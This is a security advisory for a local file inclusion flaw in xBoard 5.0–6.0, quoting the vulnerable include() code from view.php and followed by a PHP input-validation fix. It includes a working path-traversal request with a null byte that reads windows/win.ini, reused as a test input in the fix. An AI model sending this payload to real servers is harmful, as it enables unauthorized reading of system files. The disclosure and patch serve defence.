xBoard 5.0 / 5.5 / 6.0 Local File Inclusion
Posted on 26 December 2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/xboard/
[+] Google Dork:
[+] Tested on: Win7, Ubuntu 13.04
########################################################################################
I/Vulnerable code:
view.php

v5.0 (lines 49-51):
    if (file_exists("$directory/$post.html"))
    {
        include("$directory/$post.html");

v5.5 (lines 28-30):
    if (file_exists("$directory/$post.html"))
    {
        include("$directory/$post.html");

v6.0 (lines 27-29):
    if (file_exists("$directory/$post.html"))
    {
        include("$directory/$post.html");

II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg

III/Solution:
Upgrade to v6.5

./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt
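
For sites that must patch in place, one way to constrain $post before the include shown in section I. This is an added example, not xBoard code and not the v6.5 fix; the helper name resolve_post_path() and the temporary demo directory are assumptions.

```php
<?php
// Added example (not xBoard code). resolve_post_path() is a hypothetical helper.
// It returns the absolute path of "$directory/$post.html" only when $post is a
// plain identifier and the resolved file sits inside $directory; otherwise null.
function resolve_post_path(string $directory, $post): ?string
{
    // Allowlist: rejects arrays, NUL bytes, slashes and dots in one step.
    if (!is_string($post) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $post)) {
        return null;
    }

    $base = realpath($directory);
    if ($base === false) {
        return null;
    }

    // realpath() resolves ".." and symlinks and returns false for a missing
    // file, so it also covers the original file_exists() check.
    $path = realpath($base . DIRECTORY_SEPARATOR . $post . '.html');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Containment: the resolved path must still be under the posts directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a temporary posts directory holding one post.
$directory = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'xboard_demo_posts';
@mkdir($directory);
file_put_contents($directory . DIRECTORY_SEPARATOR . 'hello.html', '<p>hello</p>');

// Constructed inputs; the second mirrors the request shape from section II.
$samples = ['hello', '../../../../windows/win.ini' . "\0", '..', 'missing', ['x']];
foreach ($samples as $post) {
    $path = resolve_post_path($directory, $post);
    echo json_encode($post), ' => ', $path === null ? 'rejected' : 'served', PHP_EOL;
}
```

Serving the returned path with readfile() instead of include() also keeps the file's contents from being interpreted as PHP.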
